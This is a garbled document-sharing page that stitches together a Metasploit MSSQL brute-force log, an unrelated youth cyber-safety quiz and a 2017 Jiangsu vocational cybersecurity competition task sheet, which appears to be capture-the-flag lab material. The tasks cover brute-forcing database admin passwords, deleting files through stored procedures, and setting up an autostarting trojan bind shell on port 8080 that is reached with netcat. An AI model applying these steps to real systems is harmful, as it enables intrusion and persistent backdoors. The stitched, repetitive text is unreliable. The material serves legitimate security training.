C:\1.txt'6.通过对服务器场景WebServ2003的数据库服务进行安全加固,阻止PC2中渗透测试平台对其进行数据库超级管理员密码暴力破解渗透测试,并将加固身份验证选项中的最后一个字符串作为Flag提交:W7.验证在WebServ2003的数据库服务进行安全加固后,再次通过PC2中渗透测试平台对服务器场景WebServ2003进行数据库服务超级管理员口令进行暴力破解(使用PC2中的渗透测试平台中的字典文件superdic.txt),并将破解结果的从上向下数第3行内容作为Flag提交;msf auxiliary(mssql_login) > run[*] - - MSSQL - Starting authentication scanner.[!] - No active DB -- Credential data will not be saved![-] - - LOGIN FAILED: WORKSTATION\sa:!@#$% (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!@#$%^ (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!@#$%^& (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!@#$%^&* (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!boerbul (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!boerseun (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!gatvol (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!hotnot (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!kak (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:!koedoe (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!likable (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!poes (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!pomp (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!soutpiel (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:.net (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:0 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:000000 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:00000000 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:0007 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:007 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:007007 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:0s (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:0th (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:1 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:10 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:100 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:1000 (Incorrect: )[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed(三)第二阶段任务书假定各位选手是某企业信息安全工程师,负责服务器的维护,其中某服务器可能存在着各种问题和漏洞(见以下漏洞列表)。
江苏省青少网络信息安全知识竞赛题目及答案

江苏省青少网络信息安全知识竞赛题目及答案在当今数字化的时代,网络已经成为青少年生活中不可或缺的一部分。
然而,网络世界中也存在着各种潜在的安全风险。
为了提高青少年对网络信息安全的认识和防范能力,江苏省举办了一场精彩的青少年网络信息安全知识竞赛。
以下是此次竞赛中的部分题目及答案,让我们一起来学习一下。
题目 1:以下哪种行为可能导致个人信息泄露?A 在正规网站填写个人信息B 随意连接公共场合的免费 WiFiC 定期更新电脑系统答案:B解析:公共场合的免费 WiFi 存在较大的安全隐患,不法分子可能会通过这些网络窃取用户的个人信息。
而在正规网站填写个人信息,只要网站有良好的安全防护措施,一般不会导致信息泄露。
定期更新电脑系统有助于修复漏洞,提高安全性。
题目 2:收到陌生号码发来的短信,告知你中了大奖,需要先缴纳手续费才能领取奖金,你应该怎么做?A 按照要求缴纳手续费B 拨打短信中的电话询问详情C 不予理睬,这可能是诈骗答案:C解析:这很可能是一种常见的诈骗手段。
不法分子以中奖为诱饵,骗取受害者的钱财。
一旦缴纳手续费,不仅拿不到所谓的奖金,还会遭受经济损失。
对于此类信息,应坚决不予理睬。
题目 3:在网络上与陌生人交流时,以下哪种做法是不安全的?A 透露自己的家庭住址B 只交流兴趣爱好C 不轻易相信对方的话答案:A解析:向陌生人透露家庭住址等个人隐私信息可能会给自己带来危险,比如遭遇跟踪、骚扰甚至更严重的犯罪行为。
题目 4:以下哪个是设置强密码的正确方式?A 使用生日作为密码B 使用简单的数字组合,如 123456C 包含大小写字母、数字和特殊符号的组合答案:C解析:生日和简单的数字组合很容易被破解,而包含多种字符类型的组合会大大增加密码的安全性。
题目 5:发现自己的电脑中了病毒,应该怎么做?A 立即拔掉电源B 用杀毒软件进行查杀C 不管它,继续使用答案:B解析:拔掉电源可能会导致数据丢失,不管它则会让病毒进一步破坏电脑系统和文件。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
2017年江苏省职业学校信息技术类技能大赛
网络空间安全(中职组)B卷
一、竞赛时间
9:00-12:00,共计3小时。
二、竞赛阶段简介
三、竞赛任务书内容
(一)拓扑图
(二)第一阶段任务书
1.根据网络拓扑图所示,配置交换机的管理VLAN为VLAN888;
2.根据网络拓扑图所示,配置交换机管理VLAN的IP地址为
88.88.88.X/24。
(X为每参赛队所在组号);
3.据网络拓扑图所示,配置交换机telnet服务,交换机Telnet用户名:zhongke;密码:选手自行设定;
4.根据《赛场参数表》,配置交换机上连实战平台网络接口为Trunk;
5.根据《赛场参数表》,配置交换机实战平台管理VLAN为VLAN80,并将PC1所连接口划入该VLAN;
6.根据网络拓扑图所示,在第二阶段开始时按照《赛场参数表》配置交换机渗透测试VLAN,并将PC2所连接口划入该VLAN;
7.根据网络拓扑图所示,在第三阶段开始时按照《赛场参数表》配置交换机渗透测试VLAN,并预备将PC2所连接口划入该VLAN。
8.将交换机配置内容拷贝成文本文件保存到U盘根目录,文件名为参赛队所在组号。
(三)第二阶段任务书
请使用谷歌浏览器登录服务器192.168.80.1,根据《赛场参数表》提供的用户名密码登录,登录后点击“闯关关卡”,左侧有第二阶段的任务列表。
点击右侧的“网络靶机”,进入虚机完成任务,找到FLAG值,填入空框内,点击“提交任务”按钮。
提示:所有FLAG中包含的字符全部是英文字符。
虚拟机:Backtrack5(用户名:root;密码:toor)
虚拟机:WindowsXP(用户名:administrator;密码:123456)
任务1. 数据库安全加固
任务环境说明:
✓服务器场景:WebServ2003(用户名:administrator;密码:空)
✓服务器场景操作系统:Microsoft Windows2003 Server
✓服务器场景安装服务/工具1:Apache2.2;
✓服务器场景安装服务/工具2:Php6;
✓服务器场景安装服务/工具3:Microsoft SqlServer2000;
✓服务器场景安装服务/工具4:EditPlus;
1.对服务器场景WebServ2003安装补丁,使其中的数据库Microsoft SqlServer2000能够支持远程连接,并将补丁包程序所在目录名称作为Flag提交。
2.对服务器场景WebServ2003安装补丁,使其中的数据库Microsoft SqlServer2000能够支持远程连接,在安装补丁后的服务器场景中运行netstat –an命令,将回显的数据库服务连接状态作为Flag提交。
3.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务
扫描渗透测试,并将扫描结果作为Flag提交。
4.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务超级管理员口令暴力破解(使用PC2中的渗透测试平台中的字典文件superdic.txt),并将破解结果中的最后一个字符串作为Flag提交。
5.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务扩展存储过程进行利用,删除WebServ2003服务器场景C:\1.txt,并将渗透测试利用命令字符串以及渗透测试平台run结果第1行回显作为Flag提交。
6.通过对服务器场景WebServ2003的数据库服务进行安全加固,阻止PC2中渗透测试平台对其进行数据库超级管理员密码暴力破解渗透测试,并将加固身份验证选项中的最后一个字符串作为Flag提交。
7.验证在WebServ2003的数据库服务进行安全加固后,再次通过PC2中渗透测试平台对服务器场景WebServ2003进行数据库服务超级管理员口令进行暴力破解(使用PC2中的渗透测试平台中的字典文件superdic.txt),并将破解结果的上数第3行内容作为Flag提交。
任务2.Linux系统安全加固
任务环境说明:
✓服务器场景:CentOS5.5(用户名:root;密码:123456)
✓服务器场景操作系统:CentOS5.5
1.通过PC2中渗透测试平台对服务器场景CentOS5.5进行服务扫描渗透测试,并将扫描结果上数第5行的4个单词作为Flag(形式:单词1|单词2|单词3|单词4)提交。
2.在原目录下编译、运行./root/autorunp.c木马程序,使该木马程序能够实现远程连接 8080端口,并在该端口上运行/bin/sh命令行程序,并将编译./root/autorunp.c木马程序需要输入的命令字符串作为Flag提交。
3.在原目录下编译、运行./root/autorunp.c木马程序,使该木马程序能够实现远程连接 8080端口,并在该端口上运行/bin/sh命令行程序,并将运行./root/autorunp.c木马程序需要输入的命令字符串作为Flag(形式:命令
1|命令2|…|命令n)提交。
4.将autorunp.c木马程序设置为系统启动后自动加载,并转入系统后台运行,并将所修改的配置文件的路径和名称作为Flag提交。
5.重新启动CentOS5.5服务器场景,通过PC2中渗透测试平台NETCAT远程打开CentOS5.5服务器场景./bin/sh程序,并运行查看IP地址命令,并将运行查看IP地址命令字符串作为Flag提交。
6.对CentOS5.5服务器场景进行安全加固,阻止PC2中渗透测试平台对服务器场景CentOS5.5进行远程超级管理员口令暴力破解,并将所配置的文件的路径和名称字符串作为Flag提交。
(四)第三阶段任务书
请使用谷歌浏览器登录服务器192.168.80.100,根据《赛场参数表》提供的用户名密码登录进行三阶段比赛。
各位选手是某公司的系统安全管理员,负责服务器(受保护服务器IP、管理员账号见现场发放的参数表)的维护,该服务器可能存在着各种问题和漏洞(见漏洞列表)。
你需要尽快对服务器进行加固,十五分钟之后将会有很多黑客对这台服务器进行攻击。
提示:服务器中的漏洞可能是常规漏洞也可能是系统漏洞;需要加固常规漏洞;并对其它参赛队系统进行渗透测试,取得FLAG值并提交到裁判服务器。
十五分钟之后,各位选手将真正进入分组对抗环节。
注意事项:
注意1:任何时候不能人为关闭服务器常用服务端口(21、22、23、53、80),否则将判令停止比赛,第三阶段分数为0分;
注意2:不能对裁判服务器进行攻击,否则将判令停止比赛,第三阶段分数为0分。
注意3:在加固阶段(前十五分钟,具体听现场裁判指令)不得对任何服务器进行攻击,否则将判令攻击者停止比赛,第三阶段分数为0分。
注意4:FLAG值为每台受保护服务器的唯一性标识,每台受保护服务器仅
有一个。
在渗透测试环节里,各位选手需要继续保护你的服务器免受各类黑客的攻击,你可以继续加固你的服务器,你也可以选择攻击其他组的保护服务器。
漏洞列表如下:
1. 靶机上的网站可能存在命令注入的漏洞,要求选手找到命令注入的相关漏洞,利用此漏洞获取一定权限。
2. 靶机上的网站可能存在文件上传漏洞,要求选手找到文件上传的相关漏洞,利用此漏洞获取一定权限
3. 靶机上的网站可能存在文件包含漏洞,要求选手找到文件包含的相关漏洞,与别的漏洞相结合获取一定权限并进行提权
4. 操作系统提供的服务可能包含了远程代码执行的漏洞,要求用户找到远程代码执行的服务,并利用此漏洞获取系统权限。
5. 操作系统提供的服务可能包含了缓冲区溢出漏洞,要求用户找到缓冲区溢出漏洞的服务,并利用此漏洞获取系统权限。
6. 操作系统中可能存在一些系统后门,选手可以找到此后门,并利用预留的后门直接获取到系统权限。
选手通过以上的所有漏洞点,最后得到其他选手靶机的最高权限,并获取到其他选手靶机上的FLAG值进行提交。